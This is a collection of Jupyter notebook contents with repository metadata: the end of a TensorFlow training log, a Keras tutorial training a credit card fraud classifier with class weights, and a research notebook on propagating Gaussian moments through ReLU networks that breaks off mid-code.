3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165 3165\n 3165 3165 3165 3165 3165 3165 3165 3165]\nINFO:tensorflow:Current Speed: 2.370sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 9.448%\nINFO:tensorflow:Current Loss: 8.608\nINFO:tensorflow:Epoch 1/7, Global Step: 108\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.586sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 9.829%\nINFO:tensorflow:Current Loss: 8.011\nINFO:tensorflow:Epoch 1/7, Global Step: 118\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Current Speed: 2.545sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 10.273%\nINFO:tensorflow:Current Loss: 8.993\nINFO:tensorflow:Epoch 1/7, Global Step: 128\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:global_step/sec: 0.416666\nINFO:tensorflow:Current Speed: 2.427sec/batch\nINFO:tensorflow:Current Streaming Accuracy: 10.527%\nINFO:tensorflow:Current Loss: 7.904\nINFO:tensorflow:Epoch 1/7, Global Step: 138\nINFO:tensorflow:Current Learning Rate: 0.0010000000474974513\nINFO:tensorflow:Validation Speed: 0.160sec/batch\nINFO:tensorflow:Current Streaming ValAccuracy: 1.042%\nINFO:tensorflow:Real Label: [4800 4393 3277 4393 2159 3692 4015 4800 3929 344 2816 921 1343 3407 3692\n 3059 2826 3328 1301 3345 4153 3692 4153 4814 4382 4861 4830 2923 1420 2996\n 485 3376 4302 688 1313 3623 3165 4057 4279 4651 4393 4800 98 1593 4350\n 289 2886 3787 229 3456 3748 762 1372 2841 4350 377 2908 4816 1644 1054\n 4800 4045 4806 3643 3623 144 1233 501 3643 689 538 4984 828 2908 4286\n 3059 4305 3692 567 2902 130 4045 3185 4816 3598 4814 3501 2902 3328 4350\n 160 3800 804 229 4429 4816 4888 2902 5001 1277 2533 4816 4279 2897 2218\n 4970 2897 4970 3623 2884 2849 4800 4045 4814 4970 289 689 991 289 1415\n 3692 2886 1301 3182 4792 341 3797 567]\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e70651dea384efd3b043eb1baebb704abfc1227b | 7,430 | ipynb | Jupyter Notebook | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 1,542 | 2020-05-06T20:23:07.000Z | 2022-03-31T15:25:03.000Z | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 625 | 2020-05-07T10:21:15.000Z | 2022-03-31T17:19:35.000Z | examples/structured_data/ipynb/imbalanced_classification.ipynb | YassineYousfi/keras-io | a620cf365d0acb02a6cd73ca5b8e5414ebced08f | [
"Apache-2.0"
] | 1,616 | 2020-05-07T06:28:33.000Z | 2022-03-31T13:35:35.000Z | 25.888502 | 97 | 0.538358 | [
[
[
"# Imbalanced classification: credit card fraud detection\n\n**Author:** [fchollet](https://twitter.com/fchollet)<br>\n**Date created:** 2019/05/28<br>\n**Last modified:** 2020/04/17<br>\n**Description:** Demonstration of how to handle highly imbalanced classification problems.",
"_____no_output_____"
],
[
"## Introduction\n\nThis example looks at the\n[Kaggle Credit Card Fraud Detection](https://www.kaggle.com/mlg-ulb/creditcardfraud/)\ndataset to demonstrate how\nto train a classification model on data with highly imbalanced classes.",
"_____no_output_____"
],
[
"## First, vectorize the CSV data",
"_____no_output_____"
]
],
[
[
"import csv\nimport numpy as np\n\n# Get the real data from https://www.kaggle.com/mlg-ulb/creditcardfraud/\nfname = \"/Users/fchollet/Downloads/creditcard.csv\"\n\nall_features = []\nall_targets = []\nwith open(fname) as f:\n for i, line in enumerate(f):\n if i == 0:\n print(\"HEADER:\", line.strip())\n continue # Skip header\n fields = line.strip().split(\",\")\n all_features.append([float(v.replace('\"', \"\")) for v in fields[:-1]])\n all_targets.append([int(fields[-1].replace('\"', \"\"))])\n if i == 1:\n print(\"EXAMPLE FEATURES:\", all_features[-1])\n\nfeatures = np.array(all_features, dtype=\"float32\")\ntargets = np.array(all_targets, dtype=\"uint8\")\nprint(\"features.shape:\", features.shape)\nprint(\"targets.shape:\", targets.shape)\n",
"_____no_output_____"
]
],
[
[
"## Prepare a validation set",
"_____no_output_____"
]
],
[
[
"num_val_samples = int(len(features) * 0.2)\ntrain_features = features[:-num_val_samples]\ntrain_targets = targets[:-num_val_samples]\nval_features = features[-num_val_samples:]\nval_targets = targets[-num_val_samples:]\n\nprint(\"Number of training samples:\", len(train_features))\nprint(\"Number of validation samples:\", len(val_features))\n",
"_____no_output_____"
]
],
[
[
"## Analyze class imbalance in the targets",
"_____no_output_____"
]
],
[
[
"counts = np.bincount(train_targets[:, 0])\nprint(\n \"Number of positive samples in training data: {} ({:.2f}% of total)\".format(\n counts[1], 100 * float(counts[1]) / len(train_targets)\n )\n)\n\nweight_for_0 = 1.0 / counts[0]\nweight_for_1 = 1.0 / counts[1]\n",
"_____no_output_____"
]
],
[
[
"## Normalize the data using training set statistics",
"_____no_output_____"
]
],
[
[
"mean = np.mean(train_features, axis=0)\ntrain_features -= mean\nval_features -= mean\nstd = np.std(train_features, axis=0)\ntrain_features /= std\nval_features /= std\n",
"_____no_output_____"
]
],
[
[
"## Build a binary classification model",
"_____no_output_____"
]
],
[
[
"from tensorflow import keras\n\nmodel = keras.Sequential(\n [\n keras.layers.Dense(\n 256, activation=\"relu\", input_shape=(train_features.shape[-1],)\n ),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dropout(0.3),\n keras.layers.Dense(256, activation=\"relu\"),\n keras.layers.Dropout(0.3),\n keras.layers.Dense(1, activation=\"sigmoid\"),\n ]\n)\nmodel.summary()\n",
"_____no_output_____"
]
],
[
[
"## Train the model with `class_weight` argument",
"_____no_output_____"
]
],
[
[
"metrics = [\n keras.metrics.FalseNegatives(name=\"fn\"),\n keras.metrics.FalsePositives(name=\"fp\"),\n keras.metrics.TrueNegatives(name=\"tn\"),\n keras.metrics.TruePositives(name=\"tp\"),\n keras.metrics.Precision(name=\"precision\"),\n keras.metrics.Recall(name=\"recall\"),\n]\n\nmodel.compile(\n optimizer=keras.optimizers.Adam(1e-2), loss=\"binary_crossentropy\", metrics=metrics\n)\n\ncallbacks = [keras.callbacks.ModelCheckpoint(\"fraud_model_at_epoch_{epoch}.h5\")]\nclass_weight = {0: weight_for_0, 1: weight_for_1}\n\nmodel.fit(\n train_features,\n train_targets,\n batch_size=2048,\n epochs=30,\n verbose=2,\n callbacks=callbacks,\n validation_data=(val_features, val_targets),\n class_weight=class_weight,\n)\n",
"_____no_output_____"
]
],
[
[
"## Conclusions\n\nAt the end of training, out of 56,961 validation transactions, we are:\n\n- Correctly identifying 66 of them as fraudulent\n- Missing 9 fraudulent transactions\n- At the cost of incorrectly flagging 441 legitimate transactions\n\nIn the real world, one would put an even higher weight on class 1,\nso as to reflect that False Negatives are more costly than False Positives.\n\nNext time your credit card gets declined in an online purchase -- this is why.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e70655a1725bd1bfd663ec73d498ca730e9d364e | 31,321 | ipynb | Jupyter Notebook | ADF.ipynb | ModarTensai/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 2 | 2019-04-24T20:26:55.000Z | 2019-05-29T19:43:59.000Z | ADF.ipynb | ModarTensai/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 5 | 2020-01-28T22:11:08.000Z | 2021-08-25T14:45:47.000Z | ADF.ipynb | xmodar/gaussian-regularizer | e9d6ffd989e26ef2fa49290221f7feed878c9eb3 | [
"MIT"
] | 1 | 2019-04-25T11:13:20.000Z | 2019-04-25T11:13:20.000Z | 43.023352 | 991 | 0.507455 | [
[
[
"## Run package tests",
"_____no_output_____"
]
],
[
[
"# import sys\n# import unittest\n# import network_moments.torch.gaussian as gnm\n# runner = unittest.TextTestRunner(sys.stdout, verbosity=2)\n# load = unittest.TestLoader().loadTestsFromModule\n# result = runner.run(unittest.TestSuite([\n# load(gnm.relu.tests),\n# load(gnm.affine.tests),\n# load(gnm.net.adf.tests),\n# ]))",
"_____no_output_____"
]
],
[
[
"## TODOs:\n\n - Fix relu covariance in case of zero-mean and zero-variance\n - Support scalar variance for affine.batch_moments()\n - Make computing AS faster for diagonal input variance\n - Backprobagation through the moments",
"_____no_output_____"
]
],
[
[
"import torch\nfrom time import time\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets\nimport network_moments.torch.gaussian as gnm\nfrom torch.distributions import MultivariateNormal as gaussian\n\n# %matplotlib widget\nplt.style.use('dark_background')\n\ndef timeit(stmt):\n out = get_ipython().run_line_magic('timeit', '-o -q {}'.format(stmt))\n return out.average, out.stdev\n\ndef get_gaussian(dims, sigma=1, zero_mean=False, mbatch=1, vbatch=1,\n dtype=torch.float64, device='cpu'):\n mean = torch.randn(mbatch, dims, dtype=dtype, device=device) * sigma\n if zero_mean:\n mean.zero_()\n cov = gnm.utils.rand.definite(dims, norm=sigma ** 2,\n batch=vbatch, dtype=dtype, device=device)\n var = cov.diagonal(dim1=-2, dim2=-1)\n return mean, cov, var\n\n\ndef get_net(num_layers=4, dims=2, bias_in_first_layer=True, verbose=False):\n net = gnm.net.Sequential(*[\n layer for i in range(num_layers) for layer in (\n torch.nn.Linear(dims, dims, bias=bias_in_first_layer or i > 0),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).double().eval()\n if verbose:\n print(net)\n\n relu = 2 * max(num_layers - 1, 1) - 1 # index of linearization layer\n lrs = gnm.net.Sequential.split_layers(net)\n tsl = gnm.net.Sequential.encapsulate(\n net[:relu], net[relu:relu + 1], net[relu + 1:])\n if verbose:\n print('Linearizing around layer {}.'.format(relu % len(net)))\n return net, lrs, tsl\n\n\ndef get_image(loader, index):\n for images, _ in loader:\n if index < len(images):\n image = images[index:index + 1]\n index = -1\n break\n index -= len(images)\n if index >= 0:\n print('Couldn\\'t find the image at index {} !!'.format(index))\n image = None\n return image\n\n\ndef error(a, b):\n if a.size() != b.size():\n return float('inf')\n return (a - b).abs().mean().item()\n# return ((a / b) - 1).abs().mean().item()\n# return ((a - b).norm() / a.norm()).item()",
"_____no_output_____"
],
[
"cuda = False\nlenet = gnm.net.LeNet().to('cuda' if cuda else 'cpu')\nlenet.load_state_dict(torch.load('models/mnist/lenet.pt'))\nmnist_train = datasets.MNIST('data/mnist', train=True,\n transform=lenet.default_transforms())\nmnist_train_loader = torch.utils.data.DataLoader(mnist_train,\n batch_size=5000,\n pin_memory=cuda,\n num_workers=4 if cuda else 0,\n shuffle=False,\n drop_last=False)\n# print(lenet.accuracy(mnist_train_loader, 'cuda' if cuda else 'cpu'))",
"0.9975166666666667\n"
],
[
"cuda = False\nalexnet = gnm.net.AlexNet().to('cuda' if cuda else 'cpu')\nalexnet.load_state_dict(torch.load('models/imagenet/alexnet.pt'))\nimagenet_valid = datasets.ImageFolder('data/imagenet/val/',\n transform=alexnet.default_transforms())\nimagenet_valid_loader = torch.utils.data.DataLoader(imagenet_valid,\n batch_size=64,\n pin_memory=True,\n num_workers=4,\n shuffle=False,\n drop_last=False)\n# print(alexnet.accuracy(imagenet_valid_loader, 'cuda' if cuda else 'cpu'))",
"_____no_output_____"
]
],
[
[
"## Performance comparison (forward pass vs ADF vs TSL)\n\nNOTE: ADF is 10 times slower than the forward pass and TSL is 10 times slower than ADF",
"_____no_output_____"
]
],
[
[
"# dims = 100\n# mu, cov, var = get_gaussian(dims)\n# net, lrs, tsl = get_net(num_layers=7, dims=dims)\n\n# # forward pass time\n# %timeit net(mu)\n# # 189 µs ± 1.2 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n\n# # independent ADF time\n# %timeit gnm.net.adf.gaussian(lrs, mu, var, independent=True)\n# # 1.35 ms ± 9.09 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n\n# # independent TSL time\n# %timeit gnm.net.adf.gaussian(tsl, mu, var, independent=True)\n# # 14.9 ms ± 651 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)\n\n# # TSL time\n# %timeit gnm.net.adf.gaussian(tsl, mu, cov, independent=False)\n# # 36.1 ms ± 4.11 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)",
"_____no_output_____"
]
],
[
[
"## Profile $\\mathbf{A}\\mathbf{\\Sigma}\\mathbf{A}^\\top$ if we know $\\mathbf{A}$ versus our trick\n\nWe are computing the covariance of the linearization of a neural network around a certain point. One could say that this is a memory and computation tradeoff where we can just save the linearizations and compute the covariance directly.\n\nNOTE: (Cache, Trick, ASAT) is ordered from faster to slower on both CPU and GPU",
"_____no_output_____"
]
],
[
[
"def trick_fn(net, mu, cov):\n with torch.no_grad():\n AS = gnm.utils.jac_at_x(net, mu, gnm.utils.sqrtm(cov))\n return AS.t().mm(AS)\n\ndef asat_fn(net, mu, cov):\n A = gnm.utils.linearize(net, mu.view(1, -1), True)[0]\n return A.mm(cov).mm(A.t())\n\ndef cache_fn(A, cov):\n return A.mm(cov).mm(A.t())\n\ndef asat_cache_trick(device, trials=7, dim=1000, layers=10, sigma=10, dtype=torch.float64, file=None):\n try:\n dims, times = torch.load(file)\n except:\n times = []\n dims = [2**i for i in range(13, 15)]\n for n in gnm.utils.verbosify(dims):\n net = gnm.net.Sequential(*[\n layer for i in range(1, layers + 1) for layer in (\n torch.nn.Linear(n if i == 1 else dim,\n n if i == layers else dim),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).to(device, dtype).eval()\n\n mu, cov, _ = get_gaussian(n, sigma=sigma, dtype=dtype, device=device)\n mu, cov = mu[0], cov[0]\n\n t = time()\n for _ in range(trials):\n r = asat_fn(net, mu, cov)\n asat = (time() - t) / trials\n\n t = time()\n for _ in range(trials):\n r = trick_fn(net, mu, cov)\n trick = (time() - t) / trials\n \n A = gnm.utils.linearize(net, mu.view(1, -1), True)[0]\n t = time()\n for _ in range(trials):\n r = cache_fn(A, cov)\n cache = (time() - t) / trials\n \n times.append((asat, trick, cache))\n if file is not None:\n torch.save((dims, times), file)\n plt.figure()\n plt.tick_params('y', right=True)\n plt.plot(dims, [t[0] for t in times], '+-b', label='ASA^T')\n plt.plot(dims, [t[1] for t in times], '+-r', label='Trick')\n plt.plot(dims, [t[2] for t in times], '+-g', label='Cache')\n plt.ylabel('Average time in seconds')\n plt.xlabel('Number of dimensions')\n plt.xscale('log')\n plt.yscale('log')\n plt.title('Profiling on ' + str(device))\n plt.legend()\n plt.show()\n\nasat_cache_trick(device='cpu', file='data/static/asat_cpu.pt')\nasat_cache_trick(device='cuda', file='data/static/asat_gpu.pt')",
"_____no_output_____"
]
],
[
[
"## Computing the covariance of ReLU for general Gaussian input\n\nWhich is more accurate when computing the output covariance of ReLU?\n - To copy the input covariance\n - Replace the output variance with Hinton's expressions\n\nTest all four combinations {(copy, replace), (copy), (replace), ()}\n\nNOTE: The best approach is to replace",
"_____no_output_____"
]
],
[
[
"def covariance_computation(n=100, sigma=100, count=100000):\n mu = sigma * torch.randn(n, dtype=torch.float64)\n cov = gnm.utils.rand.definite(n, norm=sigma ** 2, dtype=torch.float64)\n out = gaussian(mu, cov).sample((count,)).clamp(min=0.0)\n mc_mean = out.mean(0)\n mc_cov = gnm.utils.cov(out)\n mc_var = mc_cov.diag()\n def ocov(copy=False, replace=True):\n if copy:\n out_cov = cov.clone()\n else:\n out_cov = gnm.relu.zero_mean_covariance(cov)\n if replace:\n out_mu, out_var = gnm.relu.moments(mu, cov.diag())\n out_cov.diagonal(dim1=-2, dim2=-1).copy_(out_var)\n return out_cov\n print('copy only:', error(mc_cov, ocov(True, False)))\n print('copy and replace:', error(mc_cov, ocov(True, True)))\n print('neither:', error(mc_cov, ocov(False, False)))\n print('replace:', error(mc_cov, ocov(False, True))) # gnm.relu.batch_moments is using this method\n\ncovariance_computation()",
"_____no_output_____"
]
],
[
[
"## ADF vs two-stage vs one-stage linearization tightness\n\nNOTE: 2-stage and 1-stage sometimes give the same error\n\nTODO: Binary classification visualization then test on MNIST and LeNet with two points (one is close to the decision boundary and the other is far)",
"_____no_output_____"
]
],
[
[
"torch.manual_seed(0)\n\ndef adf_vs_sl(dims=2, num_layers=4, bias_in_first_layer=True, zero_mean=False,\n samples_count=int(1e7), sigmas=(10,), verbose=False):\n net, lrs, tsl = get_net(num_layers, dims, bias_in_first_layer, verbose)\n mu, cov, var = get_gaussian(dims, 1, zero_mean)\n samples = gaussian(mu[0] * 0, cov[0]).sample((samples_count,))\n\n errors = []\n for sigma in (gnm.utils.verbosify(sigmas) if not verbose else sigmas):\n v = sigma ** 2\n out = net(samples * sigma + mu[0])\n mc_mean = out.mean(dim=0, keepdim=True)\n mc_var = out.var(dim=0, keepdim=True)\n\n adf_m, adf_v = gnm.net.adf.gaussian(lrs, mu, var * v, independent=True)\n adf_m_err = error(mc_mean, adf_m)\n adf_v_err = error(mc_var, adf_v)\n if verbose:\n print('ADF errors :', [adf_m_err, adf_v_err])\n\n lin2_m, lin2_v = gnm.net.adf.gaussian(tsl, mu, cov * v,\n independent=False, linearize=True)\n lin2_m_err = error(mc_mean, lin2_m)\n lin2_v_err = error(mc_var, lin2_v)\n if verbose:\n print('2-stage linearization:', [lin2_m_err, lin2_v_err])\n\n lin2i_m, lin2i_v = gnm.net.adf.gaussian(tsl, mu, cov * v,\n independent=True, linearize=True)\n lin2i_m_err = error(mc_mean, lin2i_m)\n lin2i_v_err = error(mc_var, lin2i_v)\n if verbose:\n print('Indep. 2-stage lin :', [lin2i_m_err, lin2i_v_err])\n\n lin1_m, lin1_v = gnm.net.adf.gaussian(\n [lambda x: net(x)], # pylint: disable=W0108\n mu, cov * v, independent=False, linearize=True\n )\n lin1_m_err = error(mc_mean, lin1_m)\n lin1_v_err = error(mc_var, lin1_v)\n if verbose:\n print('1-stage linearization:', [lin1_m_err, lin1_v_err])\n errors.append(((adf_m_err, adf_v_err),\n (lin2i_m_err, lin2i_v_err),\n (lin2_m_err, lin2_v_err),\n (lin1_m_err, lin1_v_err)))\n\n if len(sigmas) > 1:\n plt.figure()\n plt.plot(sigmas, [e[0][0] for e in errors], 'b', label='ADF')\n plt.plot(sigmas, [e[1][0] for e in errors], 'o-w', label='Li2')\n plt.plot(sigmas, [e[2][0] for e in errors], '+-r', label='Ln2')\n plt.plot(sigmas, [e[3][0] for e in errors], 'g', label='Ln1')\n plt.ylabel('Error')\n plt.xlabel('sigma')\n plt.title('Mean Errors')\n plt.legend()\n plt.show()\n\n plt.figure()\n plt.plot(sigmas, [e[0][1] for e in errors], 'b', label='ADF')\n plt.plot(sigmas, [e[1][1] for e in errors], 'o-w', label='Li2')\n plt.plot(sigmas, [e[2][1] for e in errors], '+-r', label='Ln2')\n plt.plot(sigmas, [e[3][1] for e in errors], 'g', label='Ln1')\n plt.ylabel('Error')\n plt.xlabel('sigma')\n plt.title('Variance Errors')\n# plt.yscale('log')\n plt.legend()\n plt.show()\n\n\n# print('Sanity checks:') # small linearization errors\n# adf_vs_sl(num_layers=2, bias_in_first_layer=False,\n# zero_mean=True, sigmas=(1,), verbose=True)\n\nprint('\\nBehaviour of sigmas:')\nadf_vs_sl(num_layers=5, sigmas=torch.linspace(1, 10, 10).numpy().tolist())",
"_____no_output_____"
]
],
[
[
"## Variance tightness with similar computation constraints\n\nTo compute the output variance using our expressions, we need to do a number of forward passes. One might say that doing Monte-Carlo estimation using a number of samples equal to the number of forward passes we need for our expressions might actually be tighter than our method. So, we need to verify this with varying dimensionlaity and noise level.",
"_____no_output_____"
]
],
[
[
"def constrained_variance(dim=100, layers=3, sigma=1, count=10000,\n dtype=torch.float64, device='cpu'):\n for n in [2**i for i in range(1, 13)]:\n net = gnm.net.Sequential(*[\n layer for i in range(1, layers + 1) for layer in (\n torch.nn.Linear(n if i == 1 else dim,\n n if i == layers else dim),\n torch.nn.ReLU(inplace=True),\n )\n ][:-1]).to(device, dtype).eval()\n relu = 2 * max(num_layers - 1, 1) - 1 # index of linearization layer\n tsl = gnm.net.Sequential.encapsulate(\n net[:relu], net[relu:relu + 1], net[relu + 1:])\n mu, cov, _ = get_gaussian(n, sigma=sigma, dtype=dtype, device=device)\n\n dist = gaussian(mu[0], cov[0])\n samples = dist.sample((count,))\n mc_var = net(samples).var(dim=0)\n\n samples = dist.sample((n,))\n small_mc_var = net(samples).var(dim=0)\n exp_var = gnm.net.adf.gaussian(tsl, mu, cov, independent=False)\n\n small_mc_error = error(mc_var, small_mc_var)\n exp_error = error(mc_var, exp_var)\n\n print(small_mc_error - exp_error)",
"_____no_output_____"
]
],
[
[
"## Gaussianity test of the output of each layer of neural networks\n\nADF is assuming that the output of each layer in the neural network is uncorrelated Gaussian.\nThe Gaussianity of data samples can be tested using either [hypothesis testing](https://link.springer.com/content/pdf/10.1007%2Fs00362-002-0119-6.pdf) (whether there is sufficient evidence that the data is Guassian or not) or by estimating the PDF as a histogram and compare it to the PDF of the best Gaussian fit. [This](https://en.wikipedia.org/wiki/Multivariate_normal_distribution#Multivariate_normality_tests) is an example of a hypothesis test for a multivariate Gaussian but first it assumes that the covariance matrix is full-rank. However, in our case, the covariance matrix is most probably rank deficient since the affine transformations are themselves rank deficient. Plus, after the ReLU some units might actually be almost determistic zero which makes this assumption even more strict. However, in this case, we can work with each element and [test its Gaussianity](https://machinelearningmastery.com/a-gentle-introduction-to-normality-tests-in-python/) independently.\n\nNOTE: Each affine after a ReLU manages, somehow, to return the distribution to Gaussian",
"_____no_output_____"
]
],
[
[
"def fit_normal_and_display(x):\n plt.figure()\n fit = gnm.utils.stats.gaussian.fit(x)\n label = 'PDF fits ~{:.2f}%'.format(100 * fit['similarity'])\n plt.plot(fit['xs'].numpy(), fit['pdf'].numpy(), 'c', label=label)\n label = 'N({:.2f}, {:.2f}^2)'.format(fit['mean'], fit['std'])\n plt.plot(fit['xs'].numpy(), fit['fit'].numpy(), 'g', label=label)\n plt.legend()\n plt.show()\n \ndef display_layer_gaussianity(normality):\n bins = gnm.utils.stats.num_hist_bins(normality, min_bins=50)\n hist = normality.histc(bins, min=0, max=1)\n xs = torch.linspace(0, 100, bins)\n plt.figure()\n plt.plot(xs.numpy(), hist.numpy())\n plt.xlabel('Gaussianity fit')\n plt.ylabel('Number of units')\n msg = 'Mean fit: {:.2f}% ({} units : {} bins)'\n plt.title(msg.format(100 * normality.mean(), normality.numel(), bins))\n plt.show()\n \ndef network_gaussianity(net, mu, sigma, count):\n if torch.is_tensor(sigma) and sigma.numel() > 1:\n if sigma.dim() == 1:\n sigma = sigma.diag()\n else:\n sigma = gnm.utils.rand.definite(mu.numel(), norm=sigma ** 2,\n dtype=mu.dtype, device=mu.device)\n print('Testing the Gaussianity of the output of each layer in {}\\n'\n 'with a Gaussian input that has a covariance matrix of norm {}\\n'\n 'using Monte-Carlo estimation with {} samples around the image\\n'.format(\n type(net).__name__, sigma.norm(), count\n ))\n\n x = gaussian(mu.view(-1), sigma).sample((count,)).view(-1, *mu.shape[1:])\n for layer in gnm.net.Sequential.split_layers(net):\n x = layer(x)\n if isinstance(layer, gnm.utils.Flatten):\n continue\n if hasattr(layer, 'layers'):\n for el in layer.layers:\n print(el)\n else:\n print(layer)\n reshaped_x = x.view(x.size(0), -1)\n normality = gnm.utils.stats.gaussian.gaussianity(reshaped_x, std_threshold=1e-5)\n normality[normality > 0.99] = 0 # remove deterministic (variance = 0)\n# fit_normal_and_display(reshaped_x[:, normality.argmin()])\n display_layer_gaussianity(normality)",
"_____no_output_____"
],
[
"# network_gaussianity(lenet, get_image(mnist_train_loader, 1) + 127.5, sigma=64, count=1000)",
"_____no_output_____"
],
[
"# network_gaussianity(lenet, torch.randn(1, 1, 28, 28), sigma=0.3, count=1000)",
"_____no_output_____"
],
[
"# net = gnm.net.Sequential(\n# torch.nn.Linear(1, 2),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(2, 4),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(4, 15),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(15, 50),\n# torch.nn.ReLU(inplace=True),\n# torch.nn.Linear(50, 500),\n# ).double().eval()\n# network_gaussianity(net, torch.randn(1, 1).double(), sigma=0.3, count=1000)",
"_____no_output_____"
]
],
[
[
"## Computing the output variance of affine for Gaussian input $\\mathbf{x}\\sim\\mathcal{N}\\left(\\mathbf{\\mu}, \\mathbf{\\Sigma} =\\text{diag}\\left(\\mathbf{v}\\right)\\right)$\n\nThe variance of affine ($\\mathbf{A}\\mathbf{x}+\\mathbf{b}$) is $\\text{diag}\\left(\\mathbf{A}\\mathbf{\\Sigma}\\mathbf{A}^\\top\\right) = \\text{diag}\\left(\\mathbf{A}\\text{diag}\\left(\\mathbf{v}\\right)\\mathbf{A}^\\top\\right) = (\\mathbf{A}^2)\\mathbf{v}$ (because $\\mathbf{v} \\geq \\mathbf{0}$)\n\nIf $\\mathbf{v} = \\sigma^2\\mathbf{1}$, The variance will be $\\sigma^2\\text{diag}\\left(\\mathbf{A}\\mathbf{A}^\\top\\right) = \\sigma^2\\left(\\mathbf{A}^2\\right)\\mathbf{1} = \\sigma^2\\ \\text{sum_columns}\\left(\\mathbf{A}^2\\right)$",
"_____no_output_____"
]
],
[
[
"import torch\nimport network_moments.torch.gaussian as gnm\n\nclass Net(gnm.net.Sequential):\n def __init__(self, conv=True, shallow=False):\n if conv:\n part1 = [\n torch.nn.Conv2d(3, 2, kernel_size=5),\n gnm.utils.Flatten(),\n ]\n else:\n part1 = [torch.nn.Linear(5, 72)]\n part2 = [] if shallow else [\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(10, 2),\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(2, 2),\n ]\n super().__init__(\n *part1,\n torch.nn.ReLU(inplace=True),\n torch.nn.Linear(72, 10),\n *part2,\n )\n \n def mean(self, mu, var):\n '''Compute the output mean of the network for gaussian input.\n \n Args:\n mu: Input mean (Batch, *Size).\n var: The input variance (Size) or a scalar.\n \n Returns:\n The output mean of the network.\n '''\n layer = self[0]\n if not torch.is_tensor(var):\n var = torch.tensor(var, dtype=mu.dtype, device=mu.device)\n if isinstance(layer, torch.nn.Linear):\n if not isinstance(self[1], torch.nn.ReLU):\n raise ValueError('The second layer of the network must be a ReLU')\n layers = self[2:]\n w = layer.weight\n affine_mu = layer(mu)\n if var.numel() == 1:\n affine_std = ((w * w).sum(1) * var).sqrt().unsqueeze_(0)\n else:\n affine_std = (w * w).mv(var).sqrt().unsqueeze_(0)\n elif isinstance(layer, torch.nn.Conv2d):\n if not isinstance(self[1], gnm.utils.Flatten):\n raise ValueError('The second layer of the network must be a gnm.utils.Flatten')\n if not isinstance(self[2], torch.nn.ReLU):\n raise ValueError('The third layer of the network must be a ReLU')\n layers = self[3:]\n w = layer.weight\n affine_mu = self[1](layer(mu))\n if var.numel() == 1:\n var = var.repeat(1, *mu.shape[1:])\n else:\n var = var.view(1, *mu.shape[1:])\n affine_std = self[1](torch.nn.functional.conv2d(var, w**2,\n stride=layer.stride,\n padding=layer.padding,\n dilation=layer.dilation,\n groups=layer.groups).sqrt())\n else:\n msg = 'Don\\'t know how to compute the moments for {}'\n raise NotImplemented(msg.format(type(layer)))\n relu_mu = gnm.relu.mean(affine_mu, affine_std, std=True)\n return self.forward(relu_mu, layers=layers)\n \n @staticmethod\n def test_linear(shallow=True, n=7, sigma=10, count=100000, dtype=torch.float64):\n net = Net(conv=False, shallow=shallow).to(dtype)\n if not isinstance(net[0], torch.nn.Linear):\n raise ValueError('The first layer of the network must be a torch.nn.Linear')\n print(net)\n mu = sigma * torch.randn(n, net[0].in_features, dtype=dtype)\n var = sigma**2 * torch.rand(mu.size(-1), dtype=dtype)\n normal_samples = torch.distributions.MultivariateNormal(\n mu[0, ...] * 0, var.diag()).sample((count,))\n for i in range(mu.size(0)):\n with torch.no_grad():\n samples = normal_samples + mu[i, ...]\n out_mu = net.mean(mu[i:i+1, ...], var)\n mc_mu = net(samples).mean(0, keepdim=True)\n print(round((out_mu / mc_mu).abs().mean().item(), 1))\n \n @staticmethod\n def test_conv2d(shallow=True, n=7, sigma=10, count=100000, dtype=torch.float64):\n net = Net(conv=True, shallow=shallow).to(dtype)\n if not isinstance(net[0], torch.nn.Conv2d):\n raise ValueError('The first layer of the network must be a torch.nn.Conv2d')\n print(net)\n mu = sigma * torch.randn(n, net[0].in_channels, 10, 10, dtype=dtype)\n var = sigma**2 * torch.rand(*mu.shape[1:], dtype=dtype)\n normal_samples = torch.distributions.MultivariateNormal(\n mu[0, ...].view(-1) * 0, var.view(-1).diag()).sample((count,)).view(count, *mu[0].size())\n for i in 